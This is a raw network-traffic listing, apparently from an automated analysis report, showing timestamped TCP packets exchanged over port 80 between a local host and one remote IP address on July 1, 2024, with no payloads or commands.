Jul 1, 2024 13:02:10.996332884 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:10.996383905 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:10.996412039 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:10.996423006 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:10.996457100 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:10.996602058 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:10.996646881 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:10.999290943 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:10.999305964 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:10.999319077 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:10.999360085 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:10.999386072 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:10.999408007 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:10.999447107 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.001569033 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.001652002 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.001665115 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.001682043 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.001704931 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.001724005 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.001857996 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.001899004 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.002633095 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.002680063 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.002697945 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.002721071 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.003110886 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.003158092 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.003181934 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.003190994 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.003218889 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.003237009 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.005332947 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.005374908 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.005417109 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.005433083 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.005497932 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.005537987 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.005594015 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.005604982 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.005631924 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.005651951 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.006350040 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.006402969 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.006427050 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.006438971 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.006468058 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.006629944 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.006675005 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.008827925 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.008884907 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.008896112 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.008904934 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.008925915 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.008943081 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.009037971 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.009049892 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.009085894 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.009594917 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.009665966 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.009680033 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.009685993 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.009710073 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.009727955 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.009860039 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.009905100 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.011118889 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.011195898 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.011207104 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.011218071 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.011243105 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.011264086 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.011373043 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.011416912 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.012516022 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.012569904 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.012597084 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.012608051 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.012635946 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.012654066 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.012763023 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.012804985 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.013195038 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.013242006 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.013281107 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.013293982 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.013324022 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.013345003 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.013463020 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.013503075 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.014492989 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.014537096 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.014591932 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.014602900 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.014642000 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.014791012 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.014836073 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.015415907 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.015459061 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.015476942 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.015491009 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.015518904 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.015537977 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.015644073 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.015686035 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.016596079 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.016640902 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.016665936 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.016710997 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.016829014 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.016876936 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.016899109 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.016908884 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.016946077 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.017982006 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.018047094 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.018066883 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.018079996 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.018114090 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.018253088 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.018301964 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.018440962 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.018491983 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.018512011 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.018521070 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.018548012 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.018564939 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.018634081 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.018642902 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.018688917 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.020143986 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.020230055 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.020240068 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.020250082 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.020272017 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.020289898 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.020415068 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.020462990 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.020764112 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.020807028 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.020816088 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.020847082 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.020859957 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.020901918 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.020982027 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.020992041 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.021034956 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.037781000 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.037853956 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.038829088 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.038845062 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.038856983 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.038867950 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.038880110 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.038891077 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.038902044 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.038912058 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.038923025 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.038933992 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.038944960 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.038955927 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.038966894 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.039024115 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.039079905 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.061381102 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.061397076 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.061408997 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.061466932 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.061506033 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.061517954 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.061528921 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.061552048 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.061572075 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.061877966 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.061888933 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.061930895 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.067848921 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.067909956 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.067936897 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.067949057 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.067986965 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.068231106 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.068240881 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.068253040 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.068275928 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.068305969 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.068600893 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.068649054 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.072186947 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.072268009 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.072290897 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.072302103 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.072335958 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.072477102 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.072499990 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.072511911 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.072525978 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.072534084 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.072561026 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.072587013 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.072912931 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.072963953 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.082638979 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.082695961 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.082720041 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.082731009 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.082760096 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.082779884 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.082940102 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.082957983 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.082987070 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.083004951 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.083175898 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.083187103 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.083198071 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.083231926 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.083251953 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.086899042 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.086951971 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.086966991 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.086976051 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.087007046 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.087141991 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.087152958 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.087165117 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.087177992 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.087188959 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.087210894 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.087496996 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.087542057 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.097111940 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.097172976 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.097208023 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.097219944 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.097253084 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.097507954 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.097518921 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.097531080 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.097544909 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.097558975 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.097588062 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.098083019 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.098093987 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.098104954 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.098117113 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.098129034 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.098138094 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.098149061 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.098156929 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.098165989 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.098175049 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.098217964 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.100318909 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.100373983 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.100425959 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.100436926 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.100471973 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.100709915 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.100720882 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.100733042 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.100759029 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.100775957 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.102015972 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.102067947 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.103342056 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.103391886 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.103415966 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.103426933 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.103460073 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.103775024 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.103785992 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.103796959 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.103825092 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.103842020 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.103956938 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.104008913 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.106529951 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.106585979 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.106616974 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.106628895 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.106662989 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.106847048 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.106859922 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.106893063 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.106919050 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.107706070 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.107718945 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.107758045 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.110637903 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.110686064 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.110724926 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.110735893 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.110764027 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.110781908 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.110943079 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.110955000 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.110974073 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.110985994 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.111023903 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.111063004 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.111419916 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.111430883 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.111443043 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.111454010 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.111469984 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.111479998 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.111490011 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.111501932 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.111510992 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.111531019 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.111553907 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.113143921 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.113215923 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.113234997 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.113245010 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.113270998 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.113281965 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.113451958 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.113461971 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.113473892 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.113502026 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.113528013 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.113763094 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.113810062 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.120187998 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.120266914 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.120277882 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.120286942 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.120306969 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.120321989 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.120588064 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.120599031 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.120609999 CEST	80	49705	147.45.78.162	192.168.2.5
